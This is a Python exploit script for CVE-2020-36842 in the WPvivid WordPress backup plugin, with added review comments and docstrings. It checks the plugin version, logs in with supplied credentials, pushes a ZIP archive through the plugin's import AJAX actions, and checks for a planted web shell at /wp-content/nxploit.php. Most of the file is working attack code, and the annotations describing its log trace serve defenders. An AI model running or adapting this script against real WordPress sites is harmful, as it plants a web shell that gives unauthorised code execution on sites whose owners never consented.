import requests
import os
import time
import argparse
#by Khaled alenazi Nxploit
# One shared HTTP session carries every request the script makes.
# `session.verify = False` is the line that turns off TLS certificate
# validation; `disable_warnings()` only silences the warning urllib3 would
# otherwise emit for each unverified request.
# NOTE(review): with validation off, the WordPress credentials posted by
# login() are readable by anyone able to intercept the connection.
session = requests.Session()
session.verify = False
requests.packages.urllib3.disable_warnings()

# Command-line interface. Parsing happens at module import, so importing this
# file without the three required options ends in an argparse usage error.
parser = argparse.ArgumentParser(
    description="CVE-2020-36842 - WPvivid Plugin Arbitrary File Upload Vulnerability"
)
parser.add_argument("-u", required=True, help="Target WordPress site URL")
parser.add_argument("-un", required=True, help="WordPress username")
parser.add_argument("-p", required=True, help="WordPress password")
args = parser.parse_args()
def check_version(url):
    """Fingerprint the WPvivid plugin from its publicly readable readme.txt.

    Requests ``/wp-content/plugins/wpvivid-backuprestore/readme.txt`` under
    *url* through the shared session (no login has happened yet at this point
    in ``main``) and searches the body for a ``Stable tag:`` marker.

    Prints the verdict. Returns ``None`` when a marker is present; otherwise,
    or when the request raises, the process is ended with ``exit()``.
    """
    readme_url = url + "/wp-content/plugins/wpvivid-backuprestore/readme.txt"
    try:
        body = session.get(readme_url, timeout=10).text
    except requests.RequestException as e:
        print(f"[!] Version check error: {e}")
        exit()

    # NOTE(review): the second marker is a prefix of the first, so it alone
    # decides the outcome, and as a substring test it also matches every tag
    # that merely starts with "0.9.3". The HTTP status is not inspected
    # either. Treat the verdict as a rough fingerprint and confirm the
    # affected range against the advisory for the CVE.
    markers = ("Stable tag: 0.9.35", "Stable tag: 0.9.3")
    if not any(marker in body for marker in markers):
        print("[!] Target is not vulnerable.")
        exit()
    print("[+] Target is vulnerable. Proceeding with exploitation.")
def login(url, username, password):
    """Authenticate the shared session against ``wp-login.php`` under *url*.

    The later admin-ajax calls in this script are made with the cookies this
    login leaves in the session, so the flow depends on a valid WordPress
    account.

    Prints the outcome. Ends the process with ``exit()`` when the request
    fails, the server answers with an error status, or no cookie whose name
    contains ``wordpress_logged_in`` is present afterwards.
    """
    form = {
        "log": username,
        "pwd": password,
        "rememberme": "forever",
        "wp-submit": "Log In"
    }
    # Fixed desktop-browser User-Agent, sent on this request only; the other
    # requests in the script use the session's default headers.
    browser_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"}

    try:
        reply = session.post(url + "/wp-login.php", data=form, headers=browser_headers, timeout=10)
        reply.raise_for_status()
    except requests.RequestException as e:
        print(f"[!] Login error: {e}")
        exit()

    # Success is judged by the auth cookie, not by the response body.
    logged_in = False
    for cookie in session.cookies:
        if 'wordpress_logged_in' in cookie.name:
            logged_in = True
            break

    if not logged_in:
        print("[!] Login failed.")
        exit()
    print("[+] Logged in successfully.")
def find_zip_file():
    """Return the name of a ``.zip`` entry in the current working directory.

    The first match in ``os.listdir('.')`` order is returned; that order is
    not sorted, so with several archives present the choice is arbitrary.
    When nothing matches, a message is printed and the process is ended with
    ``exit()``.
    """
    for entry in os.listdir('.'):
        if entry.endswith('.zip'):
            return entry
    print("[!] No ZIP file found in the current directory.")
    exit()
def send_request(data, files=None, retries=3):
    """POST *data* (plus optional multipart *files*) to ``TARGET_URL``.

    ``TARGET_URL`` is a module global that is assigned only under the
    ``__main__`` guard, so this function raises ``NameError`` if the module
    is imported rather than run.

    Up to *retries* attempts are made, with a 3-second pause after each
    failed one. Returns the response body of the first attempt that gets a
    non-error status. If every attempt fails, the literal string
    ``"[!] All attempts failed."`` is returned instead of raising, so a
    caller cannot tell it apart from a response body by type.
    """
    attempt = 0
    while attempt < retries:
        try:
            reply = session.post(TARGET_URL, data=data, files=files, timeout=10)
            reply.raise_for_status()
            return reply.text
        except requests.RequestException as e:
            print(f"[!] Request error (Attempt {attempt+1}/{retries}): {e}")
            time.sleep(3)
        attempt += 1
    return "[!] All attempts failed."
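def main():
    """Run the scripted request sequence against the site given with ``-u``.

    Order of operations: version fingerprint, login, then five POSTs to
    admin-ajax.php whose ``action`` values are ``wpvivid_upload_import_files``,
    ``wpvivid_check_import_file``, ``wpvivid_upload_import_file_complete``,
    ``wpvivid_start_import`` and ``wpvivid_get_import_progress``, separated by
    5-second pauses, and finally a GET for ``/wp-content/nxploit.php``.

    For log review, that burst of ``wpvivid_*`` import actions from one
    authenticated session followed by a request for a PHP file directly
    under ``/wp-content/`` is the trace this script leaves. The plugin
    release that fixes the CVE named in the script description should be
    taken from its advisory; it is not stated in this file.

    Each step prints the server's reply; nothing is returned.
    """
    check_version(args.u)
    login(args.u, args.un, args.p)

    file_path = find_zip_file()
    print(f"[+] Found file: {file_path}")

    # Open the archive in a ``with`` block so the handle is closed as soon as
    # the upload call returns; the original left it open until process exit.
    with open(file_path, "rb") as archive:
        files = {"async-upload": (file_path, archive, "application/zip")}
        data = {"name": file_path, "chunk": "0", "chunks": "1", "action": "wpvivid_upload_import_files"}
        print("[+] Uploading file: ", send_request(data, files))
    time.sleep(5)

    check_file_data = {"action": "wpvivid_check_import_file", "file_name": file_path}
    print("[+] Checking file: ", send_request(check_file_data))
    time.sleep(5)

    # The id, size and date in this JSON are fixed literals rather than values
    # read from the archive, so requests from an unmodified copy of this
    # script carry the same strings wherever request bodies are logged.
    upload_complete_data = {
        "action": "wpvivid_upload_import_file_complete",
        "files": f"[{{\"id\":\"o_1ilg3pu22185h1r7gvmorasib37\",\"name\":\"{file_path}\",\"type\":\"application/zip\",\"size\":2342,\"origSize\":2342,\"loaded\":2342,\"percent\":100,\"status\":5,\"lastModifiedDate\":\"3/4/2025, 3:19:23 AM\"}}]",
    }
    print("[+] Confirming upload: ", send_request(upload_complete_data))
    time.sleep(5)

    start_import_data = {"action": "wpvivid_start_import", "file_name": file_path, "user": "1"}
    print("[+] Starting import: ", send_request(start_import_data))
    time.sleep(5)

    progress_data = {"action": "wpvivid_get_import_progress"}
    print("[+] Import progress: ", send_request(progress_data))

    # Final probe: a 200 for this fixed path is reported as success.
    # NOTE(review): the file name presumably comes from the contents of the
    # supplied archive, which is not part of this page. A 200 alone does not
    # prove the file was created by this run.
    shell_url = args.u + "/wp-content/nxploit.php"
    try:
        response = session.get(shell_url, timeout=10)
        if response.status_code == 200:
            print("[+] Shell uploaded successfully at:", shell_url)
        else:
            print("[!] Shell not found.")
    except requests.RequestException as e:
        print(f"[!] Shell check error: {e}")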
if __name__ == "__main__":
    # admin-ajax.php is the single endpoint send_request() posts to. The
    # global is bound here, so it exists only when the file runs as a script.
    TARGET_URL = f"{args.u}/wp-admin/admin-ajax.php"
    main()